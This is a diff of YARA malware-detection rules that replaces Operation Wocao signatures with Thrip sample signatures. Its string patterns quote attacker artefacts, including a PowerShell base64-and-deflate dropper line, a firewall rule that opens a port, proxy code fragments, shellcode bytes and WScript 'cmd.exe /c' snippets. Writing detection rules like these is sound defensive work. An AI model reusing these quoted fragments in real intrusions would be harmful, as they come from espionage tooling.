+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "5b506069-8185-5dc0-bf64-90646f6bab6b"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L77-L89"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "279fb27637d9b62b484283f778215d042de9fb83110a233e048452e921c540ee"
+		logic_hash = "6e94111abe83aa500bfa35a3a7c2d43c3ed4011bc540401f047e84cfc27204ca"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "59509a17d516813350fe1683ca6b9727bd96dd81ce3435484a5a53b472ff4ae9"
 
 	strings:
-		$header = "QlpoOTFBWSZTWWDdHjgABDTfgHwQe////z/v/9+////6YA4cGPsAl2e8M9LSU128"
+		$s1 = "idocback.dll" fullword ascii
+		$s2 = "constructor or from DllMain." fullword ascii
+		$s3 = "appmgmt" fullword ascii
+		$s4 = "chksrv" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Keylogger_Py
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_2 : FILE
 {
 	meta:
-		description = "Strings from Python keylogger"
-		author = "Fox-IT SRT"
-		id = "f7b5ec1b-669e-5e7d-a9d3-011d212eb363"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "bc1cfcc8-64a0-5da0-8ff7-147da8a3af0b"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L91-L107"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L31-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2dc2ce153d559d795f302f5ca4a9ef9e6e5c54762472e38e6f4a26ef8a28a184"
+		logic_hash = "ddd3dee11e25ea40fa3cc578c6a836ea850359a5914d5eb5d16ea4340827b91b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1fc9f7065856cd8dc99b6f46cf0953adf90e2c42a3b65374bf7b50274fb200cc"
 
 	strings:
-		$a = "c:\\windows\\temp\\tap.tmp"
-		$b = "c:\\windows\\temp\\mrteeh.tmp"
-		$c = "GenFileName"
-		$d = "outfile"
-		$e = "[PASTE:%d]"
+		$s1 = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" fullword ascii
+		$s2 = "ProbeScriptFint" fullword wide
+		$s3 = "C:\\WINDOWS\\system32\\cmd.exe" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Keylogger_File
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_3 : FILE
 {
 	meta:
-		description = "Rule for finding keylogger output files"
-		author = "Fox-IT SRT"
-		id = "22e866b3-4b02-593a-b9a6-aa86870b6509"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "67ea7ed1-954f-5b3e-b058-452be3b6fdfa"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L109-L121"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L48-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6d2d677b69eaf31843e8352bfe040c9e5a8d423d17900e022b769d28789f2d98"
+		logic_hash = "f1617829ccf7da6ee2e9f692fbf1f61d3f1c6a17103db85190d6a8b4fca69328"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0d2abdcaad99e102fdf6574b3dc90f17cb9d060c20e6ac4ff378875d3b91a840"
 
 	strings:
-		$a = { 0d 0a 20 [3-10] 53 74 61 72 74 75 70 3a 20 [3] 20 [3] 20 [2] 20 [2] 3a [2] 3a [2] 20 }
+		$s1 = "C:\\Windows\\SysNative\\cmd.exe" fullword ascii
+		$s2 = "C:\\Windows\\SysNative\\sysprep\\cryptbase.dll" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Csharp
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_4 : FILE
 {
 	meta:
-		description = "Strings from the CSharp version of XServer"
-		author = "Fox-IT SRT"
-		id = "48f4c88d-fb56-54ca-84e2-38f88804a50f"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "9dcfcdbd-d18f-5eba-a10c-95686f010f23"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L123-L141"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L64-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1201ee45df78cf3aec4b4bbb59cb7e4a70af6928895bb7c968ef02075a963405"
+		logic_hash = "f258070054a29cbec0876536d295b85c7bd9f23988d1e0fc2ba58660b0796716"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6b236d3fc54d36e6dc2a26299f6ded597058fed7c9099f1a37716c5e4b162abc"
 
 	strings:
-		$a = "static void ServerX(int ListenPort)" ascii wide
-		$b = "public class xserver" ascii wide
-		$c = "[xserver]::Main($args);" ascii wide
-		$d = "add rule name=powershell dir=in localport=47000 action=allow" ascii wide
-		$e = "string TempFile = file_path + \".CT\";" ascii wide
-		$f = "Port = 256 * RecvBuf[AddrLen + 5] + RecvBuf[AddrLen + 6];"
-		$g = "CliSock.Send(new byte[] { 0x05, 0x00 });"
+		$s1 = "\\system32\\wbem\\tmf\\caches_version.db" ascii
+		$s2 = "ProcessName No Access" fullword ascii
+		$s3 = "Hwnd of Process NULL" fullword ascii
+		$s4 = "*********The new session is be opening:(%d)**********" fullword ascii
+		$s5 = "[EXECUTE]" fullword ascii
+		$s6 = "/------------------------------------------------------------------------" fullword ascii
+		$s7 = "constructor or from DllMain." fullword ascii
+		$s8 = "Time:%d-%d-%d %d:%d:%d" fullword ascii
+		$s9 = "\\info.config" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 5 of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Powershell_B64Encoded
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_5 : FILE
 {
 	meta:
-		description = "Piece of Base64 encoded data from the XServer PowerShell dropper"
-		author = "Fox-IT SRT"
-		id = "01e38cfb-b245-5398-b037-6d1d2fb726ee"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "42c56ed6-a509-568f-a611-ce7e5c5d9d8e"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L143-L155"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L87-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "77315f0fc8387fa87892fc8fcea1f6e8a95560049aaa9a87519859020d0a7a3e"
+		logic_hash = "6f2d4cfd55017ebb34fb6e8ad1b0b46b184926c69d4bacee88dc639771f96792"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "32889639a27961497d53176765b3addf9fff27f1c8cc41634a365085d6d55920"
 
 	strings:
-		$header_47000 = "5T39c9u2kr/nr2A0Ny2VKIzkfLRJntuJHafPN/nwWG777rUZDy3BNq8UqSEpx26b"
-		$header_25667 = "5T1rc9u2st/zKxjNmZZKFEZyErdJ6nZsx+nxnTjxWGp77mkzHlqCbd5SpIak/Gjr"
+		$s2 = "c:\\windows\\USBEvent.exe" fullword ascii
+		$s5 = "c:\\windows\\spdir.dat" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Powershell_Dropper
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_6 : FILE
 {
 	meta:
-		description = "Strings from the PowerShell dropper of XServer"
-		author = "Fox-IT SRT"
-		id = "97169ab4-d68d-5137-83de-d9cac975747e"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "a1c65bc1-371e-509f-a01c-2d58c1773f95"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L157-L168"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L103-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "640c9e52f3cf3df4e954177624e6fba4bab80a2c9442b718fe90e8577dafbbd6"
+		logic_hash = "f6cc84ebed26a0dbecfcb3ffb3a11c111ae3d5b40497d59ada518d33bee57fdd"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "44f58496578e55623713c4290abb256d03103e78e99939daeec059776bd79ee2"
 
 	strings:
-		$encfile = "New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($encfile)"
+		$s1 = "C:\\Windows\\system32\\Instell.exe" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Injector_Bin
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_7 : FILE
 {
 	meta:
-		description = "Process injector/launcher"
-		author = "Fox-IT SRT"
-		id = "389279f1-6531-594f-97b6-5adbc8fa4d3d"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "16739590-eb88-5de2-bd76-974b3343ec19"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L170-L193"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L118-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c8cd4e3c87c6d80b39069f7a94e512e3f7b739c21f6fd70c2a79829c5a04f32f"
+		logic_hash = "198f8869e56d5549d9195524a86f6557162c5d25b4915bec0bf513797d880ea1"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6b714dc1c7e58589374200d2c7f3d820798473faeb26855e53101b8f3c701e3f"
 
 	strings:
-		$a = "%s{%04d-%02d%02d-%02d%02d-%d%ld}.tmp"
-		$b = "s% > s% c/ exe.d"
-		$c = {
-            48 89 5C 24 08 48 89 74  24 10 57 48 83 EC 50 48
-            8B 71 08 48 8D 59 10 48  8B F9 48 8B CB FF 17 33
-            C9 48 8D 47 78 48 89 44  24 48 4C 8D 87 9C 03 00
-            00 48 89 5C 24 40 48 8D  97 90 00 00 00 4C 89 44
-            24 38 45 33 C9 48 89 4C  24 30 45 33 C0 89 4C 24
-            28 C7 44 24 20 01 00 00  00 66 89 4B 40 FF D6 48
-            8B 5C 24 60 33 C0 48 8B  74 24 68 48 83 C4 50 5F
-            C3
-        }
+		$s1 = "C:\\runme.exe" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Timeliner_Bin
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_8 : FILE
 {
 	meta:
-		description = "Timeliner utility"
-		author = "Fox-IT SRT"
-		id = "3d81a4ae-0ce0-5867-ac93-a706556481b6"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "5eb98c9e-5103-5146-9364-d5f24416406f"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L195-L213"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L133-L148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c3a8cddc34134faaab93ee0df0086604e4a7b031530dd65e2e8dab705483305b"
+		logic_hash = "6c8ddc7fb5f3256e57e66f502f6e3c582d82540f773bf4113cac4a685d45f81b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0f2d09b1ad0694f9e71eeebec5b2d137665375bf1e76cb4ae4d7f20487394ed3"
 
 	strings:
-		$a = "[+] Work completed." ascii wide
-		$b = "[-] Create a new file failed." ascii wide
-		$c = "[-] This is not a correct path." ascii wide
-		$d = "%s [TargetPath] <Num> <SavePath>" ascii wide
-		$e = "D\t%ld\t%ld\t%ld\t%d\t%d\t%s\t" ascii wide
-		$f = "D\t%ld\t%ld\t%ld\t-1\t%d\t%s\t" ascii wide
-		$g = "%s\t%ld\t%ld\t%ld\t%I64d\t%d\t%s\t%s" ascii wide
+		$x1 = "$.oS.Run('cmd.exe /c '+a+'" fullword ascii
+		$x2 = "new $._x('WScript.Shell');" ascii
+		$x3 = ".ExpandEnvironmentStrings('%Temp%')+unescape('" ascii
 
 	condition:
-		1 of them
+		filesize < 10KB and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Checkadmin_Bin
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_9 : FILE
 {
 	meta:
-		description = "Checkadmin utility"
-		author = "Fox-IT SRT"
-		id = "2f819213-ade1-525b-af18-d77b7fc96093"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "7fcd8d7f-ed60-5155-a0dd-f3a36f3f2981"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L215-L232"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L150-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "784ec960ce2733aebc404ee5c09bb852eb45553ad167db292d05b82feedbd5a6"
+		logic_hash = "0500481ae4bb7d4a223a106d2887b994e5000815704e678b2f3ff127a86c22a2"
 		score = 75
 		quality = 85
-		tags = ""
-
-	strings:
-		$a = "[-] %s * A system error has occurred: %d" ascii wide
-		$b = {
-            0D 00 0A 00 25 00 6C 00 64 00 20 00 72 00 65 00
-            73 00 75 00 6C 00 74 00 73 00 2E 00 0D 00 0A 00
-        }
-		$c = "%s\t<Access denied>" ascii wide
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8e6682bcc51643f02a864b042f7223b157823f3d890fe21d38caeb43500d923e"
+		hash2 = "0c8ca0fd0ec246ef207b96a3aac5e94c9c368504905b0a033f11eef8c62fa14c"
+		hash3 = "6d0a2c822e2bc37cc0cec35f040d3fec5090ef2775df658d3823e47a93a5fef3"
+		hash4 = "0c49d1632eb407b5fd0ce32ed45b1c783ac2ef60d001853ae1f6b7574e08cfa9"
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "a7f0714e82b3105031fa7bc89dfe7664" or pe.imphash ( ) == "8812ff21aeb160e8800257140acae54b" or pe.imphash ( ) == "44a1e904763fe2d0837c747c7061b010" or pe.imphash ( ) == "51a854d285aa12eb82e76e6e1be01573" or pe.imphash ( ) == "a1f457c8c549c5c430556bfe5887a4e6" )
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Getos_Py
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_10 : FILE
 {
 	meta:
-		description = "Python getos utility"
-		author = "Fox-IT SRT"
-		id = "4a731dde-87e4-566a-b559-d23e0bef5841"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "3307ca18-59fb-5400-b51e-c4f4aa99e592"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L234-L295"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L172-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2535c01b703c0fcba43e771832db8cd969e4a4b112ef28e4ddfeac6491ba604c"
+		logic_hash = "79a8dfd63e96ccc9259272476e364e53b841b42255a2a5f3b9f93e91caa5d1c2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "350d2a6f8e6a4969ffbf75d9f9aae99e7b3a8cd8708fd66f977e07d7fbf842e3"
 
 	strings:
-		$smb_1 = {
-            00 00 00 85 ff 53 4d 42 72 00 00 00 00 18 53 c8
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe
-            00 00 ff b4 00 62 00 02 50 43 20 4e 45 54 57 4f
-            52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02
-            4c 41 4e 4d 41 4e 31 2e 30 00 02 57 69 6e 64 6f
-            77 73 20 66 6f 72 20 57 6f 72 6b 67 72 6f 75 70
-            73 20 33 2e 31 61 00 02 4c 4d 31 2e 32 58 30 30
-            32 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 02 4e 54
-            20 4c 4d 20 30 2e 31 32 00
-        }
-		$smb_2 = {
-            00 00 00 c8 ff 53 4d 42 73 00 00 00 00 18 03 c8
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe
-            00 00 3f b5 0c ff 00 c8 00 04 11 32 00 00 00 00
-            00 00 00 28 00 00 00 00 00 d4 00 00 a0 8d 00 4e
-            54 4c 4d 53 53 50 00 01 00 00 00 07 82 88 a2 00
-            00 00 00 28 00 00 00 00 00 00 00 28 00 00 00 05
-            01 28 0a 00 00 00 0f 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00
-        }
-		$smbstr_1 = "\\x00\\x00\\x00\\x85\\xffSMBr\\x00\\x00\\x00\\x00\\x18S\\xc8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\\x00\\x00\\xff\\xb4\\x00b\\x00\\x02PC NETWORK PROGRAM 1.0\\x00\\x02LANMAN1.0\\x00\\x02Windows for Workgroups 3.1a\\x00\\x02LM1.2X002\\x00\\x02LANMAN2.1\\x00\\x02NT LM 0.12\\x00"
-		$smbstr_2 = "\\x00\\x00\\x00\\xc8\\xffSMBs\\x00\\x00\\x00\\x00\\x18\\x03\\xc8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\\x00\\x00?\\xb5\\x0c\\xff\\x00\\xc8\\x00\\x04\\x112\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\xd4\\x00\\x00\\xa0\\x8d\\x00NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x07\\x82\\x88\\xa2\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x05\\x01(\\n\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
-		$code_1 = "return 'Other error.'" ascii wide
-		$code_2 = "sblob = buf[47:47 + sbl]" ascii wide
-		$code_3 = "re.split('[\\x00-,]+', y[-4])" ascii wide
-		$code_4 = "('').join(sblob[off:off + hlen].split('\\x00'))" ascii wide
-		$code_5 = "banner = '%s    %s' % (hostname, native)" ascii wide
-		$code_6 = "banner = '%s\\\\%s    %s' % (dm, hostname, native)" ascii wide
-		$tsk_1 = "PushTask" ascii wide
-		$tsk_2 = "parse_task" ascii wide
-		$tsk_3 = "commit_task" ascii wide
-		$str_1 = "Usage: getos.py <ip-range|ip-file>" ascii wide
-		$str_2 = "The path '%s' write fails." ascii wide
-		$str_3 = "Receive a signal %d," ascii wide
-		$str_4 = "Scan Complete!" ascii wide
-		$str_5 = "line: %d, %s: %s" ascii wide
-		$str_6 = "Other error." ascii wide
+		$x1 = "!This Program cannot be run in DOS mode." fullword ascii
+		$x2 = "!this program cannot be run in dos mode." fullword ascii
+		$s1 = "svchost.dll" fullword ascii
+		$s2 = "constructor or from DllMain." fullword ascii
 
 	condition:
-		( all of ( $smb_* ) ) or ( all of ( $smbstr_* ) ) or ( 3 of ( $code_* ) ) or ( all of ( $tsk_* ) ) or ( 3 of ( $str_* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( $x1 or 2 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Info_Vbs
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_11 : FILE
 {
 	meta:
-		description = "Strings from the information grabber VBS"
-		author = "Fox-IT SRT"
-		id = "b719fb31-2836-5faf-a7c8-c361a14df2be"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "69476f7d-c436-5863-bf20-1d3e821974e6"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L297-L316"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L191-L210"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e37f8768c7920b8c3d9fdd6bb3a4e748c47a6c06a8aaed01655355ef3d8c3457"
+		logic_hash = "066fc3622a0db5cc511e85f6efc08191c2c9268524c8761dc17a05e6d133c263"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "590a6796b97469f8e6977832a63c0964464901f075a9651f7f1b4578e55bd8c8"
 
 	strings:
-		$ = "Logger PingConnect"
-		$ = "Logger GetAdmins"
-		$ = "Logger InstallPro"
-		$ = "Logger Exec"
-		$ = "retstr = adminsName & \" Members\" & vbCrLf & _"
-		$ = "Logger VolumeName & \" (\" & objDrive.DriveLetter & \":)\" _"
-		$ = "txtRes = txtRes & machine & \" can"
-		$ = "retstr = \"PID   SID Image Name\" & vbCrLf & \"===="
+		$s1 = "\\AppData\\Local\\Temp\\dw20.EXE" ascii
+		$s2 = "C:\\Windows\\system32\\sysprep\\cryptbase.dll" fullword ascii
+		$s3 = "WFQNJMBWF" fullword ascii
+		$s4 = "SQLWLWZSF" fullword ascii
+		$s5 = "PFQUFQSBPP" fullword ascii
+		$s6 = "WQZXQFPVOW" fullword ascii
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "6eef4394490378f32d134ab3bf4bf194" or all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Console_Jsp
